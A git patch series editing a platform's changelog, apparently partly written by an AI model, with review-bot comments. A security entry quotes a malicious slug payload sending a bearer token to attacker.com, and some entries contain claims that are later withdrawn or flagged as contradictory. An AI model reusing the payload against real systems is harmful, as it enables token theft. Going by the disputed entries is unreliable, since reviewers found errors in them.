From ab799e93b30d42b3a6e04c1c1720d08ee8a7522b Mon Sep 17 00:00:00 2001
From: Molecule AI Documentation Specialist
Date: Sat, 16 May 2026 04:16:10 +0000
Subject: [PATCH 1/7] docs(changelog): add 2026-05-16 + backfill 2026-05-14 and 2026-05-15 entries
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

2026-05-16:
- Fix: Hermes workspace MCP server tools now reach agent loop (#22)
- Internal: Files API groundwork (molecule-core#1247/#1255/#1257/#1267)
- Internal: Scripts CI improvements (internal#431/#437)

2026-05-15: Quiet day — docs queue maintenance (#40-49 open)

2026-05-14:
- Security: OFFSEC-006 tenant slug SSRF fix (#933)
- Fix: Canvas accessibility round 3 (#936, #949)
- Internal: CI/CD hardening + test coverage

Supersedes open docs#50 (2026-05-15 quiet-day entry).

🤖 Generated by Documentation Specialist daily-changelog cron.

Co-Authored-By: Claude Opus 4.7
---
 content/docs/changelog.mdx | 40 ++++++++++++++++++++++++++++++++++++++
 1 file changed, 40 insertions(+)

diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx
index 0717703..e1b4983 100644
--- a/content/docs/changelog.mdx
+++ b/content/docs/changelog.mdx
@@ -8,6 +8,46 @@ Entries are published daily at 23:50 UTC. --- +## 2026-05-16 + +### ๐Ÿ”ง Fixes + +- **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) + +### ๐Ÿงน Internal + +- **Platform Files API groundwork** (`molecule-core`): Phase 1โ€“3 of the Files API roots RFC (`internal#425`) landed across four PRs โ€” the `secrets` package now has a canonical credential-shape regex SSOT (`#1255`); the FilesTab canvas component gains an `/agent-home` root option and a secret-shape denial placeholder (`#1257`); the API gains a stub `allowedRoots` key with a 501 short-circuit (`#1247`); and the handler test suite was hardened to prevent data races during `db.DB` swap (`#1267`). These are infrastructure PRs that enable future per-container home directory isolation โ€” the `/agent-home` root will be documented when the API ships. +- **Scripts CI improvements** (`internal`): SOP tier-check now tolerates empty/invalid tokens while the token is being provisioned (`internal#431`); the `continue-on-error` guard on the PR-body gate is disabled when the runner backlog is draining to avoid silent pass (`internal#437`). + +--- + +## 2026-05-15 + +No customer-visible changes. All activity was internal infrastructure and SOP tooling. 
+ +### ๐Ÿงน Internal + +- **Docs queue maintenance**: self-hosted Docker deployment guide, workspace ability flags (`broadcast_enabled` / `talk_to_user_enabled`) API reference, MCP server `broadcast_message` tool, CWE-78 `expandWithEnv` regression fix, OFFSEC-006 SSRF advisory, and OFFSEC-003 boundary-escaping fix all prepared in open pull requests โ€” pending CI clearance and merge. (`docs` [#40](https://git.moleculesai.app/molecule-ai/docs/pulls/40)โ€“[#49](https://git.moleculesai.app/molecule-ai/docs/pulls/49)) + +--- + +## 2026-05-14 + +### ๐Ÿ”’ Security + +- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call, and disables glob expansion of metacharacters with `set -f`. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) + +### ๐Ÿ”ง Fixes + +- **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, and other canvas components. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949)) + +### ๐Ÿงน Internal + +- **CI/CD hardening** (`molecule-core`): publish workflow Docker healthcheck made pipefail-safe (`#952`); `sop-checklist` gate renamed from `sop-checklist-gate` (`#951`); `continue-on-error` flipped to `false` on platform-build CI (`#935`); `GITHUB_EVENT_BEFORE` fallback corrected (`#937`); publish deploy images on every main push enabled (`#939`). 
+- **Test coverage additions** (`molecule-core`): OFFSEC-003 test assertions corrected for ZWSP-escaped values (`#946`); `executeDelegation` integration test calls updated (`#945`); unit tests added for `walkOrgWorkspaceNames` and `resolveParentOrgID` (`#941`). + +--- + ## 2026-05-12 ### ๐Ÿ”’ Security -- 2.52.0 From ba8ec52ca991de121d0ebf704d2f7ecce5d52d3a Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 10:15:36 +0000 Subject: [PATCH 2/7] docs(changelog): add hermes#23 bearer token 401 fix to 2026-05-16 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit molecule-ai-workspace-template-hermes#23: CONFIGS_DIR fix so molecule MCP server finds the bearer token at /configs/.auth_token. ๐Ÿค– Generated by Documentation Specialist cross-repo PR watch. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index e1b4983..a5a1536 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -13,6 +13,7 @@ Entries are published daily at 23:50 UTC. ### ๐Ÿ”ง Fixes - **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) +- **Hermes workspace bearer token 401 on MCP tool calls fixed**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message, even though the correct bearer was present on disk at `/configs/.auth_token`. The root cause was that `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file. The `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory, allowing the MCP server to find the bearer token at startup. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)) ### ๐Ÿงน Internal -- 2.52.0 From 2c85205ee7a7becd5bcf00da60949128695a92d7 Mon Sep 17 00:00:00 2001 From: Molecule AI App & Docs Lead Date: Sat, 16 May 2026 13:09:33 +0000 Subject: [PATCH 3/7] fix(changelog): remove inaccurate set -f clause from OFFSEC-006 entry The set -f clause was not part of the actual fix (validate_slug() RFC-1123 regex only). Technical-writer review identified the inaccuracy. Removes the clause per docs#51 REQUEST_CHANGES. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index a5a1536..54944e7 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -36,7 +36,7 @@ No customer-visible changes. All activity was internal infrastructure and SOP to ### ๐Ÿ”’ Security -- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call, and disables glob expansion of metacharacters with `set -f`. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) +- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) ### ๐Ÿ”ง Fixes -- 2.52.0 From d14dccdd442f8ac9a6a903c1bb3e0dcbc101f5b3 Mon Sep 17 00:00:00 2001 
From: Molecule AI Documentation Specialist
Date: Sat, 16 May 2026 13:38:28 +0000
Subject: [PATCH 4/7] docs(changelog): fold docs#45 unique entries into 2026-05-14 section
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Adds CWE-78 (expandWithEnv POSIX-identifier guard regression), OFFSEC-003 workspace-side A2A boundary marker escaping, OpenClaw template models config fix, CI infrastructure improvements, and handler test coverage additions from docs#45 — consolidating all 2026-05-14 content into docs#51 so docs#45 can be closed.

Co-Authored-By: Claude Opus 4.7
---
 content/docs/changelog.mdx | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx
index 54944e7..e71e0eb 100644
--- a/content/docs/changelog.mdx
+++ b/content/docs/changelog.mdx
@@ -37,15 +37,20 @@ No customer-visible changes. All activity was internal infrastructure and SOP to ### ๐Ÿ”’ Security - **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) +- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: shell-identifier guard at `org_helpers.go:82` was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables โ€” blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) +- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization โ€” so injection of the raw closer cannot be retroactively re-added by the sanitization pass. 
Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073)) ### ๐Ÿ”ง Fixes - **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, and other canvas components. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949)) +- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers โ†’ a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. (`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4)) ### ๐Ÿงน Internal - **CI/CD hardening** (`molecule-core`): publish workflow Docker healthcheck made pipefail-safe (`#952`); `sop-checklist` gate renamed from `sop-checklist-gate` (`#951`); `continue-on-error` flipped to `false` on platform-build CI (`#935`); `GITHUB_EVENT_BEFORE` fallback corrected (`#937`); publish deploy images on every main push enabled (`#939`). - **Test coverage additions** (`molecule-core`): OFFSEC-003 test assertions corrected for ZWSP-escaped values (`#946`); `executeDelegation` integration test calls updated (`#945`); unit tests added for `walkOrgWorkspaceNames` and `resolveParentOrgID` (`#941`). 
+- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035)) +- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999)) --- -- 2.52.0 From a56d2afe571fb91ec91b1fb5f0473a21e811f7ac Mon Sep 17 00:00:00 2001 From: Molecule AI App & Docs Lead Date: Sat, 16 May 2026 13:56:30 +0000 Subject: [PATCH 5/7] fix(changelog): trim duplicates per TW re-review Removes 2026-05-15 section (docs#49 is canonical) and all 2026-05-14 entries that duplicate docs#49 (OFFSEC-006, CWE-78, OFFSEC-003) and docs#45 (Canvas WCAG, OpenClaw, CI improvements, handler coverage). Keeps only the 2026-05-16 section with unique Hermes MCP + Files API + Scripts CI content. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 32 -------------------------------- 1 file changed, 32 deletions(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index e71e0eb..00abcf8 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -22,38 +22,6 @@ Entries are published daily at 23:50 UTC. --- -## 2026-05-15 - -No customer-visible changes. All activity was internal infrastructure and SOP tooling. - -### ๐Ÿงน Internal - -- **Docs queue maintenance**: self-hosted Docker deployment guide, workspace ability flags (`broadcast_enabled` / `talk_to_user_enabled`) API reference, MCP server `broadcast_message` tool, CWE-78 `expandWithEnv` regression fix, OFFSEC-006 SSRF advisory, and OFFSEC-003 boundary-escaping fix all prepared in open pull requests โ€” pending CI clearance and merge. (`docs` [#40](https://git.moleculesai.app/molecule-ai/docs/pulls/40)โ€“[#49](https://git.moleculesai.app/molecule-ai/docs/pulls/49)) - ---- - -## 2026-05-14 - -### ๐Ÿ”’ Security - -- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) -- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: shell-identifier guard at `org_helpers.go:82` was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables โ€” blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). 
(`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) -- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization โ€” so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073)) - -### ๐Ÿ”ง Fixes - -- **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, and other canvas components. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949)) -- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers โ†’ a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. 
(`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4)) - -### ๐Ÿงน Internal - -- **CI/CD hardening** (`molecule-core`): publish workflow Docker healthcheck made pipefail-safe (`#952`); `sop-checklist` gate renamed from `sop-checklist-gate` (`#951`); `continue-on-error` flipped to `false` on platform-build CI (`#935`); `GITHUB_EVENT_BEFORE` fallback corrected (`#937`); publish deploy images on every main push enabled (`#939`). -- **Test coverage additions** (`molecule-core`): OFFSEC-003 test assertions corrected for ZWSP-escaped values (`#946`); `executeDelegation` integration test calls updated (`#945`); unit tests added for `walkOrgWorkspaceNames` and `resolveParentOrgID` (`#941`). -- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035)) -- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999)) - ---- - ## 2026-05-12 ### ๐Ÿ”’ Security -- 2.52.0 From d1545857f494a7d6b5c804a82be0071f9de9d240 Mon Sep 17 00:00:00 2001 
From: Molecule AI Documentation Specialist
Date: Sat, 16 May 2026 14:22:19 +0000
Subject: [PATCH 6/7] docs(changelog): add molecule-core#1327 platform-side bearer-token fix

The hermes#23 bearer-token 401 was a two-part issue: workspace-side CONFIGS_DIR fix (already documented) and platform-side token-injection ownership fix (molecule-core#1327). Adds the platform-side fix to the same 2026-05-16 entry.

Co-Authored-By: Claude Opus 4.7
---
 content/docs/changelog.mdx | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx
index 00abcf8..403ffa6 100644
--- a/content/docs/changelog.mdx
+++ b/content/docs/changelog.mdx
@@ -13,7 +13,7 @@ Entries are published daily at 23:50 UTC. ### ๐Ÿ”ง Fixes - **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) -- **Hermes workspace bearer token 401 on MCP tool calls fixed**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message, even though the correct bearer was present on disk at `/configs/.auth_token`. The root cause was that `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file. The `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory, allowing the MCP server to find the bearer token at startup. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)) +- **Hermes workspace bearer token 401 on MCP tool calls fixed (two-part fix)**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message. Two independent root causes were identified and fixed: (1) workspace side โ€” `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file at `/configs/.auth_token`. `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory. 
(`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)); (2) platform side โ€” two workspace-server token-injection paths were writing `/configs/.auth_token` and `/configs/.platform_inbound_secret` as `root:root` after the template entrypoint's `chown -R agent:agent /configs` had already run. Since the MCP server runs as agent uid 1000 (via `gosu agent`), `platform_auth.get_token()` hit `Permission denied` โ†’ empty bearer โ†’ 401. Both injection paths now stamp token files as uid/gid 1000 (agent) instead of root. (`molecule-core` [#1327](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1327)) ### ๐Ÿงน Internal -- 2.52.0 From f9ac456c4dc849c6aed52626ae681163b53bff9e Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 14:23:43 +0000 Subject: [PATCH 7/7] docs(changelog): add claude-code#24 Kimi K2.6 routing to 2026-05-16 Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 403ffa6..6cbdde3 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -14,6 +14,7 @@ Entries are published daily at 23:50 UTC. - **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) - **Hermes workspace bearer token 401 on MCP tool calls fixed (two-part fix)**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message. Two independent root causes were identified and fixed: (1) workspace side โ€” `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file at `/configs/.auth_token`. `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)); (2) platform side โ€” two workspace-server token-injection paths were writing `/configs/.auth_token` and `/configs/.platform_inbound_secret` as `root:root` after the template entrypoint's `chown -R agent:agent /configs` had already run. Since the MCP server runs as agent uid 1000 (via `gosu agent`), `platform_auth.get_token()` hit `Permission denied` โ†’ empty bearer โ†’ 401. Both injection paths now stamp token files as uid/gid 1000 (agent) instead of root. 
(`molecule-core` [#1327](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1327)) +- **Claude Code template Kimi K2.6 model routed to official `api.kimi.com/coding` endpoint**: the Claude Code workspace template's adapter now correctly routes `Kimi K2.6` to the official Kimi coding endpoint (`api.kimi.com/coding`) instead of the default Anthropic-compatible endpoint, per Kimi's official API specification. (`molecule-ai-workspace-template-claude-code` [#24](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-claude-code/pulls/24)) ### ๐Ÿงน Internal -- 2.52.0
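
Review bot: In patch 1/7, the first Hermes entry of the 2026-05-16 hunk says the MCP server listens on `127.0.0.1:9100` but documents the client setting as `MOLECULE_MCP_SERVER_URL=http://localhost:9100`. Where `localhost` resolves to `::1` first, a listener bound only to the IPv4 loopback is not reached by that URL, so the entry reads as if the same failure could recur. Please check the value against `start.sh` and either document the address the server actually binds to or state that the name is intentional.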
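
Review bot: Patch 3/7 withdraws a security claim (`set -f` in the OFFSEC-006 entry) that patch 1/7 of this same series introduced, so the history records a mitigation that, per the 3/7 commit message, was never part of the fix. Squash the one-line correction into 1/7 rather than landing the inaccurate sentence and its removal as separate commits. After the removal the entry names `validate_slug()` and its regex as the only control, which matches the commit message.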
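
Review bot: In patch 4/7, the new CWE-78 entry contradicts itself about what the guard rejects. It gives `${HOME}`, `${DOCKER_HOST}` and `${AWS_SECRET_ACCESS_KEY}` as examples of "invalid shell identifiers", but all three are valid POSIX identifiers, while the regression cases listed in the same entry (`${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`) are the invalid ones. As written, a reader cannot tell whether a well-formed reference to a secret-bearing variable in `workspace_dir` is blocked or expanded. Please state which of the two the guard does, and replace the `org_helpers.go:82` line reference with the function name, since line numbers go stale.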
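
Review bot: Patch 5/7 deletes the 2026-05-14 Security section in full, so after this series the changelog carries no entry for OFFSEC-006, the Critical CWE-78 regression or OFFSEC-003 unless docs#45 and docs#49 merge. The attribution is also inconsistent: the 4/7 commit message says the CWE-78 and OFFSEC-003 entries came from docs#45, while this commit message says they duplicate docs#49. Please name the single PR that owns each security entry and order the merges so those entries land before, or together with, this one. Since 1/7, 3/7 and 4/7 add text that this patch removes again, the series would be clearer rebased down to the 2026-05-16 additions only.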
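
Review bot: In patch 6/7, part (2) of the rewritten bearer-token entry documents the owner of `/configs/.auth_token` and `/configs/.platform_inbound_secret` (uid/gid 1000) but not their file mode, which is the other half of what an operator needs in order to verify that a credential file is readable by the agent and by nobody else. Please add the mode the injection paths set and say whether an already-provisioned workspace needs a restart or re-provision to receive the corrected ownership. The punctuation around the first PR link is also broken: the sentence ends with a period, then the `#23` reference, then `); (2)`.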
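
Review bot: In patch 7/7, the added Kimi K2.6 entry records that requests now go to a different host (`api.kimi.com/coding`) but not which credential the adapter sends there. For a routing change the security-relevant fact is that the key configured for the default Anthropic-compatible endpoint is not forwarded to the new host, so please state which provider key is used. Write the endpoint with its scheme, link the specification the entry cites, and give the commit a body, since this is the only patch in the series without one.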